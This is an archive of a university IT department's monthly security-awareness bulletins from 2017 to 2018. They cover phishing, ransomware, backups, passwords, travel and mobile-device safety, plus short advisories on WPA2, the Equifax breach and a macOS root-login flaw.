November 2018: Securing New Devices in an IoT World

Without a doubt, the Internet of Things makes our lives easier and has many benefits; but we can only reap these benefits if our Internet-enabled devices are secure and trusted. Here are some tips from the STOP. THINK. CONNECT. campaign and National Cyber Security Alliance to increase the security of your Internet-enabled devices:

  • Keep a clean machine. Like your smartphone or PC, keep any device that connects to the Internet free from viruses and malware. Update antivirus and anti-malware software regularly on the device itself as well as the apps you use to control the device.
  • Think twice about your device. Have a solid understanding of how a device works, the nature of its connection to the Internet, and the type of information it stores and transmits.
  • Secure your network. Properly secure the wireless network you use to connect Internet-enabled devices. Don’t forget to use a strong password and update software regularly to protect your Wi-Fi router at home.
  • Understand how to keep IoT devices up to date. This includes any software updates that might be needed and passwords or other ways of securing devices.
  • Understand what’s being collected. Most IoT devices require data collection. Take the time to understand what information your connected devices collect and how that information is managed and used.
  • Where does your data go? Many IoT devices will send information to be stored in the cloud. Understand where your data will reside and the security protecting your personal information.
  • Do your research! Before you adopt a new smart device, research it to make sure others have had positive experiences with the device from a security and privacy perspective.
Internet of Things 101. Cars, healthcare devices, appliances, wearables, lighting, and home security all contain sensing devices which allow consumers to control them remotely. In addition, these devices collect data and literally 'talk to one another'.

September 2018: Do You Have a Personal Backup Plan?

The only way to protect yourself against valuable data loss is through regular backups. Ideally, important files should be backed up at minimum once a week, or every day, depending on how critical they are to you. This can be done manually, automatically, or using combination of the two methods

When it comes to backups, just like security, you want to find a balance of being thorough but efficient. We have all heard disastrous stories of losing homework due to the blue screen of death or a misplaced cell phone that tragically stored the only copy of family photos. In addition, you could fall victim to ransomware or another malicious attack that leaves you with no choice but to reimage your computer. It never hurts to consider your backup strategy and come up with a plan that leaves you feeling safe and secure. Here are some tips to get you started.

  • Data loss happens all the time, but it is entirely preventable. You just need to create a backup plan.
  • Your critical data should never reside in a single place.
  • The ideal backup strategy will typically include both an online backup service (e.g., Dropbox, OneDrive, Google Drive, CrashPlan) and an offline backup utility (e.g., external hard drives, flash drives) to ensure your data is secure no matter what happens to your mobile device or computer.  However, for University data, always keep in mind the classification, and what backup options are suitable for you.
  • Running consistent, automatic backups is a straightforward process that will take little time to set up and will require even less to maintain.
  • Backups can be configured to run in real time when files on your computer are changed.
  • Routinely test your backup solution to ensure you can recover your data in the event that you do actually need to restore from a backup.

For more information, visit here.


August 2018: Are You Ready for Ransomware?

What Is Ransomware?

Ransomware is a type of malicious software that encrypts your files. Often, the only way to decrypt and gain access to the files is by paying a “ransom” or fee to the attackers. The attackers might provide the decryption key allowing you to regain access to your files. Ransomware may spread to any shared networks or drives to which your devices are connected. We are continuing to see ransomware attacks and expect their frequency to increase.

How Can I Get Infected with Ransomware?
Common vectors for ransomware attacks include e-mails with malicious attachments or links to malicious websites. It’s also possible to get an infection through instant messaging or texts with malicious links. Antivirus may or may not detect a malicious attachment, so it’s important for you to be vigilant.

How Can I Protect Myself Against Ransomware?
There are two steps to protection against ransomware:

  • Preparation. Back up your information regularly. Once a ransomware infection occurs, it’s often too late to recover the encrypted information. Your research project or other important  information may be lost permanently. For more information on backups, visit RIT’s best practices web page.
  • Identification. Ransomware typically appears as phishing e-mails, either with links to malicious websites or infected files attached. You might also see a ransomware attack perpetrated through a pop-up telling you that your computer is infected and asking you to click for a free scan. Another possible vector is malvertising, malicious advertising on an otherwise legitimate website.

Probably the Most Important Steps You Can Take to Prepare…

  • Ensure that your information is backed up regularly and properly. Because ransomware can encrypt the files on your computer and any connected drives (potentially including connected cloud drives such as Dropbox), it’s important to back up your files regularly to a location that you’re not continuously connected to. To determine the backup capabilities available to you contact the IT Help Center
  • Ensure that you’re able to restore files from your backups. Again, work with your IT support personnel to discuss how to test restore capabilities.
  • Ensure that antivirus/antimalware is up to date and functioning. Antivirus may detect malicious attachments.
  • Ensure that you’re keeping your system (and mobile devices) up to date with patches. If you’re prompted by your computer or mobile device to accept updates, accept them at your earliest convenience.
  • Don’t do day-to-day work using an administrator account. A successful ransomware attack will have the same permissions that you have when working. (If you’re not using an account with administrator privileges, the initial attack may be foiled.)

What Do I Do If I Think I’m Infected?

  • Report the ransomware attack to the IT Help Center
  • Isolate or shut down the infected computer. (If you’re on Wi-Fi, turn off the Wi-Fi. If you’re plugged into the network, unplug the computer. Infected systems should be removed from the network as soon as possible to prevent ransomware from attacking network or shared drives.)

July 31st 2018: Ransom Phishing Scam

There is currently a phishing email scam being spread across many Colleges and Universities.  In this email, the sender claims to have your password, and details how they have infected your computer and collected information on your personal computing use (emails, web activity,  instant messages).  The sender then asks for a ransom payment in the form of Bitcoin.

This is a phishing scam, do not reply.

Recommended Actions:

  • If the password stated in the email is an actual password you use, change that password immediately.  It is likely that password was harvested on from one of the many publicized data breaches of sites like LinkedIn and Yahoo over the years.
  • If you ever have any concerns that your computer is not behaving properly, please contact the IS&T Service Desk
  • If you receive phishing emails, you can report them to IS&T by forwarding the email to abuse@bu.edu

July 2018: Beef Up Your Physical Security

Employing good physical security practices does not have to include hiring a detachment of the queen’s guard for your campus (though this might be a nice attraction for prospective students!). Instead, just getting the word out to your community about the importance of a few basic physical security tips can substantially improve your institution’s security risk profile. Below are some tips to share with your community:

  • Prevent tailgating. In the physical security world, tailgating is when an unauthorized person follows someone into a restricted space. Be aware of anyone attempting to slip in behind you when entering an area with restricted access.
  • Don’t offer piggyback rides. Like tailgating, piggybacking refers to an unauthorized person attempting to gain access to a restricted area by using social engineering techniques to convince the person with access to let them in. Confront unfamiliar faces! If you’re uncomfortable confronting them, contact campus safety.
  • Put that shredder to work! Make sure to shred documents with any personal, medical, financial, or other sensitive data before throwing away. Organizing campus-wide or smaller-scale shred days can be a fun way to motivate your community to properly dispose of paper waste.
  • Be smart about recycling or disposing of old computers and mobile devices. Make sure to properly destroy your computer’s hard drive. Use the factory reset option on your mobile devices and erase or remove SIM and SD cards.
  • Lock your devices. Protecting your mobile devices and computers with a strong password or PIN provides an additional layer of protection to your data in the event of theft. Set your devices to lock after a short period of inactivity; lock your computer whenever you walk away. If possible, take your mobile devices and/or laptop with you. Don’t leave them unattended, even for a minute!
  • Lock those doors and drawers. Stepping out of the room? Make sure you lock any drawers containing sensitive information and/or devices and lock the door behind you.
  • Encrypt sensitive information. Add an additional layer of protection to your files by using the built-in encryption tools included on your computer’s operating system (e.g., BitLocker or FileVault).
  • Back up, back up, back up! Keeping only one copy of important files, especially on a location such as your computer’s hard drive, is a disaster waiting to happen. Make sure your files will still be accessible in case they’re stolen or lost by backing them up on a regular basis to multiple secure storage solutions.
  • Don’t leave sensitive data in plain sight. Keeping sensitive documents or removable storage media on your desk, passwords taped to your monitor, or other sensitive information in visible locations puts the data at risk to be stolen by those who would do you or your institution harm. Keep it securely locked in your drawer when not in use.
  • Put the laptop in your trunk. Need to leave your laptop or other device in your car? Lock it in your trunk (before arriving at your destination). Don’t invite criminals to break your car windows by leaving it on the seat.
  • Install a remote location tracking app on your mobile device and laptop. If your smartphone, tablet, or laptop is lost or stolen, applications such as Find My iPhone/iPad/Mac or Find My Device (Android) can help you to locate your devices or remotely lock and wipe them.

May 2018: Use Strong Passwords and Passphrases to Lock Down Your Login!

To help keep your BU account safe, you should never reuse your BU password for any other services.  A reminder of why this is a good practice was seen last week when Twitter urged its users to change their passwords.

Twitter announced that a bug in their systems allowed for user passwords to be stored unencrypted in an internal log file.  They made sure to note that, as of now, they have seen no signs of the passwords being inappropriately accessed, shared, or used.  To be safe, it is strongly recommended that you not only change your Twitter password, but also change your passwords anywhere that you use that same password.

Sadly, stories of passwords being exposed online are not new.  It was only a few months ago that the single largest collection of passwords was exposed on the Internet.  A collection of 252 earlier breaches was aggregated into one massive database, exposing over 1.4 billion credentials.

Would you like to know if your username was included in one of the reported breaches? There are websites available to help you determine if your account was included in any known breaches, such as: https://haveibeenpwned.com/

Your passwords are the key to a host of information about you, and potentially those close to you. If someone can access your personal information, it can have serious long-term effects—and not just online! Here are some recommendations to help protect your identity while making the Internet more secure for everyone:

  • Use a passphrase instead of a password. Passphrases are usually 16 characters or more and include a combination of words or short sentence that is easy to remember (e.g., MaryHadALittleLamb!)
  • Use a fingerprint or biometric requirement to sign in when available. This provides an extra layer of protection for devices and apps.
  • Request single-use authentication codes that can be sent to your phone or delivered by an app.
  • Take advantage of whatever multifactor authentication methods are available for your service.
  •  Use a password manager or password vault software to help keep track of all your passwords and avoid password reuse.

2018 Spring Cleaning Shredding Event

IS&T is happy to announce we will be hosting a “Spring Cleaning” shredding event. Similar to the event we host each October, you will be able to bring bulk amounts of paper to be shredded at the dates and locations below. Sustainability@BU will also be on hand to receive recyclable materials. (batteries, toner, electronics, lightbulbs, etc)

This is also a good opportunity to familiarize yourself with the University’s Record Retention Policy.

Do you have old University records that need shredding?  Bring them over and let us shred them for you!

The upcoming Spring Shredding Event days are currently scheduled as follows:

Visit our Information Security Homepage for more information.


April 2018: Spring Cleaning—Be Green, Not Blue

As you upgrade your personal devices to the newest options, do you recycle the old equipment? Being green shouldn’t make you blue. Take steps now to remove anxiety later that forgotten sensitive files on your last laptop could become a source of embarrassment or identity theft. Trying to securely delete data at the time you decommission equipment can turn into a multihour chore and a source of stress, but it doesn’t need to be that way.

Make sure saved copies of your tax filings, personal photos, and other sensitive files can’t be retrieved by the next person with access to your computer’s drive by making the drive unreadable to anyone else. Dragging files to the trash or recycle bin doesn’t remove data—it just removes the retrieval path to the file and marks that storage space available for other data to occupy sometime in the future. Your pirate treasure is still buried, but the map is missing. “Secure file deletion” functions go a step further to overwrite the data in those locations with random bits immediately.

The introduction and growth of solid state drives in consumer electronics, however, makes overwriting the data in these spaces less dependable than in the standard hard drives of the past. Today’s “delete/overwrite” protection comes most reliably from full disk encryption (aka whole disk encryption), which encrypts all data on the machine—including the operating system and temporary files you weren’t even aware you created. Follow the motto of a famous infomercial to “set it [full disk encryption] and forget it [the password/key]!” Even if someone removes the drive and puts it into a different machine, the encryption remains in place.

  • Full Disk Encryption: Encrypt the full disk now using built-in functionality. Create a strong passphrase or password, since this becomes the decryption key! Everything will be encrypted, including the operating system, so you will have to “unlock” the encrypted drive with your personal passphrase every time you start or boot up your computer. Save the generated recovery key somewhere secure (like a password manager or printout stored in a secure office), in case you forget your password and need to access the data on that machine. Here are instructions for some of the most common built-in encryption functions:
  • Media Destruction: Hammer time! Remove and destroy the drive (Geek Squad offers a three-minute tutorial on hard drive disposal). Most retail stores that accept computer donations for safe recycling will remove the drive and give it to you for secure destruction—just ask them to do that. Smash it, drill it, or hold onto the drive until there’s a secure shredding event at work or in your community.

March 2018: How to Protect Your Data and Devices While Traveling with Tech

Due to enhanced security measures in most countries, travelers with tech should be prepared for possible disruptions or additional wait times during the screening process. Here are some steps you can take to help secure your devices and your privacy.

Good to know:

  • While traveling within the United States, TSA agents at the gate are not allowed to confiscate your digital devices or demand your passwords.
  • Different rules apply to U.S. border patrol agents and agents in other countries. Federal border patrol agents have broad authority to search everyone entering the U.S. This includes looking through any electronic devices you have with you while you are traveling. They can seize your devices and make a copy for experts to examine offsite. Learn more from the Electronic Frontier Foundation about digital privacy at the U.S. border.

Protect your tech and data when traveling:

  • Travel only with the data that you need; look at reducing the amount of digital information that you take with you. This may mean leaving some of your devices at home, using temporary devices, removing personal data from your devices, or shifting your data to a secure cloud service. Authorities or criminals can’t search what you don’t have.
  • Most travelers will likely decide that inconvenience overrides risk and travel with electronic devices anyway. If this is the case, travelers should focus on protecting the information that they take with them. One of the best ways to do this is to use encryption. Make sure to fully encrypt your device and make a full backup of the data that you leave at home.
  • Before you arrive at the border, travelers should power off their devices. This is when the encryption services are at their strongest and will help resist a variety of high-tech attacks that may attempt to break your encryption. Travelers should not rely solely on biometric locks, which can be less secure than passwords.
  • Make sure to log out of browsers and apps that give you access to online content, and remove any saved login credentials (turn off cookies and autofill). This will prevent anyone from using your devices (without your knowledge) to access your private online information. You could also temporarily uninstall mobile apps and clear browser history so that it is not immediately apparent which online services you use.

Get your device travel ready:

  • Change your passwords or passphrases before you go. Consider using a password manager if you don’t use one already.
  • Set up multifactor authentication for your accounts whenever possible for an additional layer of security.
  • Delete apps you no longer use.
  • Update any software, including antivirus protection, to make sure you are running the most secure version available.
  • Turn off Wi-Fi and Bluetooth to avoid automatic connections.
  • Turn on “Find My [Device Name]” tracking and/or remote wiping options in case it is lost or stolen.
  • Charge your devices before you go.
  • Stay informed of TSA regulations and be sure to check with the State Department’s website for any travel alerts or warnings concerning the specific countries you plan to visit, including any tech restrictions.
  • Clear your devices of any content that may be considered illegal or questionable in other countries, and verify whether the location you are traveling to has restrictions on encrypted digital content.
  • Don’t overlook low-tech solutions:
    • Tape over the camera of your laptop or mobile device for privacy.
    • Use a privacy screen on your laptop to avoid people “shoulder surfing” for personal information.
    • Physically lock your devices and keep them on you whenever possible, or use a hotel safe.
    • Label all devices in case they get left behind!

These guidelines are not foolproof, but security experts say every additional measure taken can help reduce the chances of cybertheft.


February 2018: Learn What It Takes to Refuse the Phishing Bait!

Cybercriminals know the best strategies for gaining access to your institution’s sensitive data. In most cases, it doesn’t involve them rappelling from a ceiling’s skylight and deftly avoiding a laser detection system to hack into your servers; instead, they simply manipulate a community member. According to IBM’s 2014 Cyber Security Intelligence Index, human error is a factor in 95 percent of security incidents. Following are a few ways to identify various types of social engineering attacks and their telltale signs.

  • Phishing isn’t relegated to just e-mail! Cybercriminals will also launch phishing attacks through phone calls, text messages, or other online messaging applications. Don’t know the sender or caller? Seem too good to be true? It’s probably a phishing attack.
  • Know the signs. Does the e-mail contain a vague salutation, spelling or grammatical errors, an urgent request, and/or an offer that seems impossibly good? Click that delete button.
  • Verify the sender. Check the sender’s e-mail address to make sure it’s legitimate. If it appears that your institution’s help desk is asking you to click on a link to increase your mailbox quota, but the sender is “UniversityHelpDesk@yahoo.com,” it’s a phishing message.
  • Don’t be duped by aesthetics. Phishing e-mails often contain convincing logos, links to actual company websites, legitimate phone numbers, and e-mail signatures of actual employees. However, if the message is urging you to take action — especially action such as sending sensitive information, clicking on a link, or downloading an attachment — exercise caution and look for other telltale signs of phishing attacks. Don’t hesitate to contact the company directly; they can verify legitimacy and may not even be aware that their name is being used for fraud.
  • Never, ever share your password. Did we say never? Yup, we mean never.Your password is the key to your identity, your data, and your classmates’ and colleagues’ data. It is for your eyes only. Your institution’s help desk or IT department will never ask you for your password.
  • Avoid opening links and attachments from unknown senders. Get into the habit of typing known URLs into your browser. Don’t open attachments unless you’re expecting a file from someone. Give them a call if you’re suspicious.
  • When you’re not sure, call to verify. Let’s say you receive an e-mail claiming to be from someone you know — a friend, colleague, or even the president of your college or university. Cybercriminals often spoof addresses to convince you, then request that you perform an action such as transfer funds or provide sensitive information. If something seems off about the e-mail, call them at a known number listed in your institution’s directory to confirm the request.
  • Don’t talk to strangers! Receive a call from someone you don’t know? Are they asking you to provide information or making odd requests? Hang up the phone and report it to the help desk.
  • Don’t be tempted by abandoned flash drives. Cybercriminals may leave flash drives lying around for victims to pick up and insert, thereby unknowingly installing malware on their computers. You might be tempted to insert a flash drive only to find out the rightful owner, but be wary — it could be a trap.
  • See someone suspicious? Say something. If you notice someone suspicious walking around or “tailgating” someone else, especially in an off-limits area, call campus safety.

January 2018: Keep Whats Private, Private

You exist in digital form all over the Internet. It is thus important to ensure that the digital you matches what you are intending to share. It is also critical to guard your privacy — not only to avoid embarrassment, but also to protect your identity and finances!

Following are specific steps you can take to protect your online information, identity, and privacy.

  • Use a unique password for each site. Hackers often use previously coampromised information to access other sites. Choosing unique passwords keeps that risk to a minimum.
  • Use a password manager. Using an encrypted password manager to store your passwords makes it easy to access and use a unique password for each site.
  • Know what you are sharing. Check the privacy settings on all of your social media accounts; some even include a wizard to walk you through the settings. Always be cautious about what you post publicly.
  • Guard your date of birth and telephone number. These are key pieces of information used for verification, and you should not share them publicly. If an online service or site asks you to share this critical information, consider whether it is important enough to warrant it.
  • Keep your work and personal presences separate. Your employer has the right to access your e-mail account, so you should use an outside service for private e-mails. This also helps you ensure uninterrupted access to your private e-mail and other services if you switch employers.
  • There are no true secrets online. Use the postcard or billboard test: Would you be comfortable with everyone reading a message or post? If not, don’t share it.

December 2017: Your Mobile Devices Won’t Secure Themselves!

Mobile security at one time meant using a laptop lock and keeping tabs on your phone. However, the growing capabilities and use of mobile devices — coupled with the ubiquity of smart devices stitched into the very fabric of our daily lives (figuratively and literally) — now require a more sophisticated defense-in-depth approach to match the growing threat. Following are a few things you can do to protect your devices and personal information on campus, at home, or at work.

  • Secure your devices with a strong password, pattern, or biometric authentication. Check the settings for each device to enable a screen-lock option. For home routers, reset the default password with a strong one.
  • Install anti-malware. Some software includes features that let you do automatic backups and track your device.
  • Check your Bluetooth and GPS access. Disable these settings on all devices when not needed and avoid using them in public areas.
  • Update your devices often. Install operating system and application updates when they become available.
  • Review phone apps regularly. Remove any apps you don’t use. Be selective when buying or installing new apps. Install only those from trusted sources and avoid any that ask for unnecessary access to your personal information.
  • Treat devices like cash! Don’t let your devices out of your sight or grasp. Maintain physical control of your device in public areas. Get a lock (alarmed is best) for your laptop and use it.
  • Keep it sunny in the cloud. Whether using Google Drive, Dropbox, OneDrive, iCloud, Amazon Drive, or any of the many cloud options, set privacy restrictions on your files to share them only with those you intend. Protect access to your cloud drive with two-factor authentication.
  • Create a secure wireless network. Configure your wireless router to protect your bandwidth, identifiable information, and personal computer. Secure it with proper set up and placement, router configuration, and a unique password, using the strongest encryption option.
  • Protect your Internet of Things (IoT) devices. Are you sharing your livestreaming nanny cam with the world? Review privacy settings for all Internet-ready devices before connecting them to the web.

November 29th 2017: Mac OS 10.13 (High Sierra) Vulnerability

A security flaw has been detected in Mac Operating Systems 10.13 (High Sierra) or greater.  This vulnerability allows anyone to login to a Mac device and gain full administrative access by typing in the username “root” with no password.  More details can be found in the links provided below.

Systems at Risk

  • Currently, this vulnerability is only found in Macs running an Operating System that has been upgraded to MacOS 10.13 (High Sierra) or greater.
          and
  • Systems that can be directly physically accessed, or have Apple Remote Desktop (ARD) enabled

Recommended Actions

Additional Information:

Homeland Security Vulnerability Note

MacRumors -Major macOS High Sierra Bug Allows Full Admin Access Without Password – How to Fix

 

 


November 2017: Securing Mobile Devices

Mobile devices have become one of the primary ways we communicate and interact with each other. The power of a computer is now at our fingertips, allowing us to bank, shop, view medical history, attend to work remotely, and communicate virtually anywhere. With all these convenient features come added risks, but here are some tips to protect your devices and your personal information.

  • Password-protect your devices. Give yourself more time to protect your data and remote wipe your device if it’s lost or stolen by enabling passwords, PINs, fingerprint scans, or other forms of authentication.
  • Secure those devices and backup data! Make sure that you can remotely lock or wipe each mobile device. That also means backing up data on each device in case you need to use the remote wipe function.
  • Verify app permissions. Don’t forget to review app specifications and privacy permissions before installing it!
  • Update operating systems. Security fixes or patches for mobile devices’ operating systems are often included in these updates.
  • Be cautious of public Wi-Fi hot spots. Avoid financial or other sensitive transactions while connected to public Wi-Fi hot spots.

October 17th 2017: Vulnerability Discovered in Wi-Fi Security Standard

You may have heard by now that a vulnerability in the WPA2 wireless security standard has been discovered.  WPA2 is a current industry standard that secures a wireless network by adding authentication and data encryption.

What does this mean?

The vulnerability recently discovered put the WPA2 protocol at risk of being bypassed – if exploited, the communications over your wireless network could be exposed, or potentially manipulated. This would put your data, such as passwords, credit card and banking information, and at risk.

What do I need to do?

While this is a serious vulnerability, it is worth noting that to exploit this, the attacker would need to be physically close to your computer. It is recommended that you still follow these basic precautions:

  • Still use WiFi security! Even with a vulnerability, it’s better than not using it at all.
  • Make sure you are using secure websites (https) when entering in any kind of sensitive information. Any connections to a secure website (https) or through a VPN will still be secure, as this layer of encryption would not be affected.
  • As always, if you’re using a public Wi-Fi connection, use a VPN and/or don’t conduct any sensitive business from that public connection.
  • Security updates and patches are already rolling out to address this flaw, it’s always advised to keep your computing equipment up to date.  Information on how to configure your computers/tablets/ phones for automatic updates can be found here.  Any wireless access points you use at home should also be updated.  A source to check on the status of various vendor’s updates can be found here.

IS&T is currently in the process of ensuring all of our affected equipment is patched for this vulnerability.

If you want to read more on the WPA2 Vulnerability, you can read more here.


September 8th 2017: Equifax Data Breach – What Happened and What it Means

What Happened?

On September 7, 2017, Equifax CEO Rick Smith announced that on Equifax suffered a data breach between May and July 2017.  The breach may have included the personal credit information of 143 million Americans, including social security numbers, birthdates, addresses, driver’s license numbers and credit account information.

What does this mean?

If a malicious hacker were to get your personal information, they could sell it, or use it to impersonate you.  They could open credit accounts in your name, and use them for illegal means.  In the event of any breach, it is normally suggested that you review and monitor your records to make sure there are no unauthorized accounts or charges on existing accounts, and no signs of suspicious activity.

Also, be careful with any suspicious emails that claim to have information about the Equifax breach.  Don’t click on links or download attachments from these emails, as hackers will often capitalize on the news of highly publicized breaches and send phishing e-mails asking consumers to provide sensitive information or visit malicious sites.

More detail of this event can be found here:

https://www.nytimes.com/2017/09/07/business/equifax-cyberattack.html


September 2017: Avoiding Ransomware Attacks

Ransomware is a type of malware designed to encrypt users’ files or lock their operating systems so attackers can demand a ransom payment. According to a 2016 Symantec report the average ransom demand is almost $700 and “consumers are the most likely victims of ransomware, accounting for 57 percent of all infections between January 2015 and April 2016.”

Similar to a phishing attack, ransomware executes when a user is lured to click on an infected link or e-mail attachment or to download a file or software drive while visiting a rogue website. Sophisticated social engineering techniques are used to entice users to take the desired action; examples include

  • an embedded malicious link in an e-mail offers a cheap airfare ticket (see figure 1);
  • an e-mail that appears to be from Google Chrome or Facebook invites recipients to click on an image to update their web browser (see figure 2); or
  • a well-crafted website mimics a legitimate website and prompts users to download a file or install an update that locks their PC or laptop.

To avoid becoming a victim of ransomware, users can follow these tips:

  • Delete any suspicious e-mail. Messages from unverified sources or from known sources that offer deals that sound too good to be true are most likely malicious (see figure 3). If in doubt, contact the alleged source by phone or by using a known, public e-mail address to verify the message’s authenticity.
  • Avoid clicking on unverified e-mail links or attachments. Suspicious links might carry ransomware (such as the CryptoLocker Trojan).
  • Use e-mail filtering options whenever possible. E-mail or spam filtering can stop a malicious message from reaching your inbox.
  • Install and maintain up-to-date antivirus software. Keeping your operating system updated with the latest virus definitions will ensure that your security software can detect the latest malware variations.
  • Update all devices, software, and plug-ins on a regular basis. Check for operating system, software, and plug-in updates often — or, if possible, set up automatic updates — to minimize the likelihood of someone holding your computer or files for ransom.
  • Back up your files. Back up the files on your computer, laptop, or mobile devices frequently so you don’t have to pay the ransom to access locked files.

August 16th 2017: Duo For Mainframe

We are making changes to the way you log in to UIS Mainframe/GALAXY on August 29. Beginning the morning of Sunday, October 1st you will no longer need your SecurID token (the little fob with a number that changes frequently) to log in to UIS using a terminal screen, often called Host On-Demand (HOD), 3270, or Reflections. You will first need connect to the two-factor VPN which will require Duo (you probably already use Duo for BUworks). After connecting to the two-factor VPN, you can connect to the UIS Mainframe/GALAXY and will only be prompted to enter in your user ID and password.

We have prepared a Frequently Asked Questions page to address some of the more commonly asked questions. Although you will no longer need your SecurID token, please hold onto them for now, as they will be collected in the near future.

We apologize for any inconvenience caused by this change. If you have any questions about this change, or require assistance, please email ithelp@bu.edu.


August 2017: Are You Practicing Safe Social Networking?

Who Else Is Online? Social media sites are not well-monitored playgrounds with protectors watching over you to ensure your safety. When you use social media, do you think about who might be using it besides your friends and connections? Following are some of the other users you may encounter.

  • Identity thieves. Cybercriminals need only a few pieces of information to gain access to your financial resources. Phone numbers, addresses, names, and other personal information can be harvested easily from social networking sites and used for identity theft. Cybercrime attacks have moved to social media, because that’s where cybercriminals get their greatest return on investment.
  • Online predators. Are your friends interested in seeing your class schedule online? Well, sex offenders or other criminals could be as well. Knowing your schedule and your whereabouts can make it very easy for someone to victimize you, whether it’s breaking in while you’re gone or attacking you while you’re out.
  • Employers. Most employers investigate applicants and current employees through social networking sites and/or search engines. What you post online could put you in a negative light to prospective or current employers, especially if your profile picture features you doing something questionable or “less than clever.” Think before you post a compromising picture or inflammatory status. (And stay out of online political and religious discussions!)

How Do I Protect My Information? Although there are no guaranteed ways to keep your online information secure, following are some tips to help keep your private information private.

  • Don’t post personal or private information online! The easiest way to keep your information private is to NOT post it. Don’t post your full birthdate, address, or phone numbers online. Don’t hesitate to ask friends to remove embarrassing or sensitive information about you from their posts, either. You can NEVER assume the information you post online is private.
  • Use privacy settings. Most social networking sites provide settings that let you restrict public access to your profile, such as allowing only your friends to view it. (Of course, this works only if you allow people you actually know to see your postings — if you have 10,000 “friends,” your privacy won’t be very well protected.)
  • Review privacy settings regularly. It’s important to review your privacy settings for each social networking site; they change over time, and you may find that you’ve unknowingly exposed information you intended to keep private.
  • Be wary of others. Many social networking sites do not have a rigorous process to verify the identity of their users. Always be cautious when dealing with unfamiliar people online. Also, you might receive a friend request from someone masquerading as a friend. Here’s a cool hint — if you use Google Chrome, right-click on the photo in a LinkedIn profile and choose Google image search. If you find that there are multiple accounts using the same image, all but one is probably spurious.
  • Search for yourself. Do you know what information is readily available about you online? Find out what other people can easily access by doing a search. Also, set up an automatic search alert to notify you when your name appears online. (You may want to set alerts for your nicknames, phone numbers, and addresses as well; you may very well be surprised at what you find.)
  • Understand the role of hashtags. Hashtags (#) are a popular way to provide clever commentary or to tag specific pictures. Many people restrict access to their Instagram accounts so that only their friends can see their pictures. However, when someone applies a hashtag to a picture that is otherwise private, anyone who searches for that hashtag can see it.

My Information Won’t Be Available Forever, Will It? Well, maybe not forever, but it will remain online for a lot longer than you think.

  • Before posting anything online, remember the maxim “what happens on the web, stays on the web.” Information on the Internet is public and available for anyone to see, and security is never perfect. With browser caching and server backups, there is a good chance that what you post will circulate on the web for years to come. So: be safe and think twice about anything you post online.
  • Share only the information you are comfortable sharing. Don’t supply information that’s not required. Remember: You have to play a role in protecting your information and staying safe online. No one will do it for you.

July 2017: Think You’ve Been Hacked? Here’s How to Shake It Off!

Face it: Hackers Gonna Hack. How to know if you’ve been hacked?

  • Your friends tell you. They’ve received a spammy or phishy e-mail from your account.
  • Your phone tells you. Collection companies are calling about nonpayment. Battery and data usage are higher than normal. Charges for premium SMS numbers show up on your bill.
  • Your browser tells you. Unwanted browser toolbars, homepages, or plugins appear unexpectedly. You’re seeing lots of pop-ups or web page redirects. Your online passwords aren’t working.
  • Your software tells you. New accounts appear on your device. Antivirus messages report that the virus hasn’t been cleaned or quarantined. You see fake antivirus messages from software you don’t remember installing. Programs are running or requesting elevated privileges that you did not install. Programs randomly crash.
  • Your bank tells you. You receive a message about insufficient funds due to unauthorized charges.
  • Your mail tells you. You receive a notification from a company that has recently suffered a cybersecurity breach.

Shake it off. Following are the steps you can take to recover.

  1. Change your affected passwords using an unaffected device. Not sure which passwords are affected? It’s best to change them all.
  2. Update your mobile software and apps. Make sure you keep them up-to-date.
  3. Update your antivirus software. Then run a complete scan. Follow the instructions provided to quarantine or delete any infected files.
  4. Update your browser software and plugins. Check frequently for new updates and delete any unnecessary or obsolete plugins.
  5. Is your computer still acting wonky? It might be best to start from scratch with a complete reformat of your machine so you can ensure that all affected software is fixed.
  6. Self-report to credit agencies. If you believe your personally identifiable information has been affected, you don’t want to deal with identity theft on top of being hacked.
  7. Be prepared with backups. Don’t let the next compromise ruin your day. Backup your files frequently. Consider storing at least two separate backups: one on an external drive and one in cloud storage.
  8. Stay ahead of the hackers. Check the Have I been pwned website to see if your accounts were hacked in a known attack.

June 2017: Basic Steps to Online Safety and Security

Follow these six National Cyber Security Alliance recommendations to better protect yourself online and make the Internet more secure for everyone:

  • Fortify each online account or device. Enable the strongest authentication tools available. This might include biometrics, security keys, or unique one-time codes sent to your mobile device. Usernames and passwords are not enough to protect key accounts such as e-mail, banking, and social media.
  • Keep a clean machine. Make sure all software on Internet-connected devices — including PCs, laptops, smartphones, and tablets — are updated regularly to reduce the risk of malware infection.
  • Personal information is like money. Value it. Protect it. Information about you, such as purchase history or location, has value — just like money. Be thoughtful about who receives that information and how it’s collected by apps or websites.
  • When in doubt, throw it out. Cybercriminals often use links to try to steal your personal information. Even if you know the source, if something looks suspicious, delete it.
  • Share with care. Think before posting about yourself and others online. Consider what a post reveals, who might see it, and how it could be perceived now and in the future.
  • Own your online presence. Set the privacy and security settings on websites to your comfort level for information sharing. It’s okay to limit how and with whom you share information.


May 2017: BU Information Security Spring Shredding Event

IS&T is happy to announce we will be hosting a “Spring Cleaning” shredding event. Similar to the event we host each October, you will be able to bring bulk amounts of paper to be shredded at the dates and locations below. The Sustainability Office will also be on hand to receive recyclable materials. (batteries, toner, electronics, lightbulbs, etc)

The upcoming Spring Shredding Event days are currently scheduled as follows:

  • Tuesday, 5/2 from 10:00-11:30 – In the Granby St. Parking Lot (CRC East: 665 Commonwealth Ave)
  • Tuesday, 5/2 from 11:45-1:15– In the parking lot behind Agganis Arena (CRC West: 925 Commonwealth Ave)
  • Wednesday, 5/3 from 11:00-2:00 – In front of the Talbot Building (BUMC: 715 Albany Street)

May 2017: Step Up to Stronger Passwords

Weak and reused passwords continue to be a common entry point for account or identity takeover and network intrusions. Simple steps and tools exist to help your end users achieve unique, strong passwords for their dozens of accounts.

A password is often all that stands between you and sensitive data. It’s also often all that stands between a cybercriminal and your account. Below are tips to help you create stronger passwords, manage them more easily, and take one further step to protect against account theft.

  • Always: Use a unique password for each account so one compromised password does not put all of your accounts at risk of takeover.
  • Good: A good password is 10 or more characters in length, with a combination of uppercase and lowercase letters, plus numbers and/or symbols — such as pAMPh$3let. Complex passwords can be challenging to remember for even one site, let alone using multiple passwords for multiple sites; strong passwords are also difficult to type on a smartphone keyboard (for an easy password management option, see “best” below).
  • Better: A passphrase uses a combination of words to achieve a length of 20 or more characters. That additional length makes its exponentially harder for hackers to crack, yet a passphrase is easier for you to remember and more natural to type. To create a passphrase, generate four or more random words from a dictionary, mix in uppercase letters, and add a number or symbol to make it even stronger — such as rubbishconsiderGREENSwim$3. You’ll still find it challenging to remember multiple passphrases, though, so read on.
